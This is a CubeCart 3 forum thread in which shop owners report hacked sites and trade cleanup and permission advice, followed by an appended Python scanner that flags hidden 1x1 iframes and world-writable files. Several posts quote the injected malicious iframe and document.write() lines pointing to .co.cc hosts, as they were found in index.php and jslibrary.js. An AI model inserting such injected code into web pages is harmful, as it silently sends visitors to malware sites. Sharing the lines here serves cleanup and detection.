CC3 site just hacked

Guest goldentongs

Hello,

This is just a message to CubeCart and anyone running CC3.

My site has 3.0.20 installed with various mods and SSL.

My site is hosted alone with nothing else installed apart from CubeCart.

Whilst working on the site today, Firefox/Google flagged my site as an attack site.

When I looked at the files I found the following in index.php:

<iframe src="http://bastionnet.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAQQAAAYHBA==" width="1" height="1" frameborder="0">

It was located at the very end of the file.

I have since deleted it and put in a review request with Google.

If anyone has any tips to better secure the site (file permissions etc.), please let me know your recommendations.


I believe it's been said (several times), a forensic examination of your server logs, FTP logs, etc. would help. (Oops, sorry, I thought you had been here a long time.)

At the time you began working on your site, did you have any other browser windows open? Some sort of password stealing or session hijacking vulnerability from another site that was open on your desktop?


Guest goldentongs

If I knew they were needed and where to obtain the logs from, I would have posted them.

I have used CubeCart for 2 years without a problem.

I had another browser open, but that only displayed the same website.

I had other tabs open in the same browser I was using; the other tabs were my cPanel, Wikipedia and Google pages.

I will get the logs and post them once I work out how to get them, as my host has locked the log programs and only one gives me an archive file that cannot be opened, and when clicking Webalizer FTP it says no file found.

Also, the computer is clean: a very new Win 7 install, regular scans, and only used for one purpose (work for 1 website), not used for general browsing etc. and only connected to the net when work is being done.


Your hosting company should be able to help you identify where the problem came from, but support for this type of problem can be lacking at many hosting companies!

The most likely source of the problem is somebody knowing your FTP password, either through brute force hacking if it is too easy or by you somehow disclosing it. However, the security generally on the server could be poor, and if either you or any other account (if they aren't running suPHP) has lax permissions on files or directories then the problem could have come in from another account.

You can analyse some of the log files and/or ask your hosting company to do it for you, and if they aren't willing to help then maybe look for another hosting company. Unless the root cause is identified it will happen again, as most of these types of hacks are automated.

Good luck

Ian


Guest goldentongs

Thanks for the advice. I will contact my host as their support is pretty good (changing host is not an option).

I also have a dedicated IP.

I know 100% nobody else knows the passwords associated with the site, and the password is pretty secure (a long password with upper and lower case letters, numbers and symbols).

How do I get the logs? In cPanel I am having no joy.

I have not set any programs to log anything as the site I am working on is new.

Any advice?

Thanks in advance.


I honestly thought you had hands-on access to your own server. Sorry for the misunderstanding.

It is my 'opinion' that having a dedicated IP (necessary for a distinct SSL certificate) does not mean your site sits alone on a server box. (But I could be wrong about that.) It may be in a virtual server, or some other server box configuration, but ultimately reachable through the filesystem via another site's vulnerabilities.

That is exactly right: having a dedicated IP address does not mean a dedicated server, so it could certainly have been accessed through another account on the server, of which there will be hundreds, if not thousands. It is also possible that, if you have installed quite a few mods, one of those has a vulnerability.

Nobody will be able to give any further help, though, until you have heard back from your hosting company about how those files were uploaded.


Same thing happened to me after 4 years using CC3, only on a different file: jslibrary.js

document.write("<iframe src='http://osufoyysdf.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAQMHBgINBQ==' width='1' height='1' frameborder='0'></iframe>");

document.write("<iframe src='http://dedede4.co.cc/notfound/inkujrgzk.php?n=setup2432' width='1' height='1' frameborder='0'></iframe>");

I restored the original file and Avast is calm now.

Anything I should do? Does it help to change permissions to 7777? And is it OK to do that?

Thanks so much!!

Leo

No, you certainly shouldn't change the permissions on that or any other file that doesn't need it to 777; that can be a huge security risk. You are much better off finding a hosting company that runs suPHP on their hosting server, which doesn't require 777 on ANY file, as that is much more secure.

Ian

Thanks a lot Ian!!

I do not know where I had my thoughts when I came up with this :)

I wanted to do the exact opposite thing!

Cheers!


Hey guys,

I have been watching this thread as I have been a victim of this a few days ago.

I hadn't noticed any problems with my site until a couple of days ago, when the page layout had changed slightly, plus a friend let me know my site was making their browser throw a red screen with a message saying I had been highlighted as a malicious site. Which is not good, plus it proved my virus software was rubbish as mine never popped anything up.

I found code very close to what has been displayed here in the index.php file. I removed this and reloaded the page and the layout was back to normal, but then I noticed it was still trying to access the web addresses listed in the code. It was only flashing up momentarily on the bottom bar. So I tried to access my jslibrary.js file but I couldn't get into it; I got a web hosting script warning. How do you get to this file if you want to edit it? So I was at a bit of a loss, so I contacted my host and they offered to restore my site to a backup from a few days back. I agreed and they did it, but when I looked it was still doing the same thing.

Another e-mail to my host and they offered to do another restore, but to a date a week or so back, to a backup that I had made. Fingers crossed, this seems to have got it back working. I have now changed my passwords for my host, FTP and CubeCart admin, and altered my permissions on the image/uploads folder to 755 and the customer image uploads folder to 755. When I have to add images in the admin will I need to change these permissions back to 777?

I was just wondering if this will be enough to keep them out, or is there more I can do to try and prevent this. At the moment I am just starting out and although it's been a hindrance it would have been more so if I was really busy.

Just thought I'd add to this thread and say how glad I am that I made a backup, and if it helps someone else then that's good.

Dave
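A defender-side check for the two things this thread keeps coming back to: the 1x1 iframe appended to index.php or wrapped in document.write() in jslibrary.js, and files left world-writable (777) on a shared host. This is an added example, not code from the thread or from CubeCart; the example.invalid URLs, file names and the temporary web root it builds are constructed sample data.

```python
import os
import re
import stat
import tempfile

# 1x1 iframe as found at the end of index.php or inside document.write() in jslibrary.js.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\bwidth=['\"]?1(?:['\"]|\b)[^>]*\bheight=['\"]?1(?:['\"]|\b)[^>]*>",
    re.IGNORECASE)
SCAN_EXT = (".php", ".js", ".html", ".htm")

def scan_file(path):
    """Return [(kind, detail)] for hidden iframes and world-writable mode."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for m in HIDDEN_IFRAME.finditer(fh.read()):
            src = re.search(r"src=['\"]([^'\"]+)", m.group(0))
            findings.append(("hidden_iframe", src.group(1) if src else m.group(0)))
    mode = os.stat(path).st_mode
    if mode & stat.S_IWOTH:  # 777-style: every account on the box can write it
        findings.append(("world_writable", oct(stat.S_IMODE(mode))))
    return findings

def scan_webroot(root):
    """Walk the web root; return {relative path: findings} for flagged files only."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXT):
                full = os.path.join(dirpath, name)
                if found := scan_file(full):
                    report[os.path.relpath(full, root)] = found
    return report

def build_sample_webroot():
    """Constructed sample: trailing iframe in index.php, document.write()
    iframe in jslibrary.js, and a clean but chmod-777 file under images/uploads."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php echo "shop"; ?>\n<iframe src="http://example.invalid/a" '
                 'width="1" height="1" frameborder="0">\n')
    with open(os.path.join(root, "jslibrary.js"), "w") as fh:
        fh.write("document.write(\"<iframe src='http://example.invalid/b' width='1' "
                 "height='1' frameborder='0'></iframe>\");\n")
    os.makedirs(os.path.join(root, "images", "uploads"))
    loose = os.path.join(root, "images", "uploads", "thumb.php")
    with open(loose, "w") as fh:
        fh.write("<?php // legitimate file, but chmod 777 ?>\n")
    os.chmod(loose, 0o777)
    return root
```

Run `scan_webroot("/path/to/public_html")` against a real web root to list files carrying a hidden iframe or world-writable permissions; a hit on a file you did not change is a restore-from-backup candidate, and a 777 hit is a permission to tighten to 755/644 as Ian advises above.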
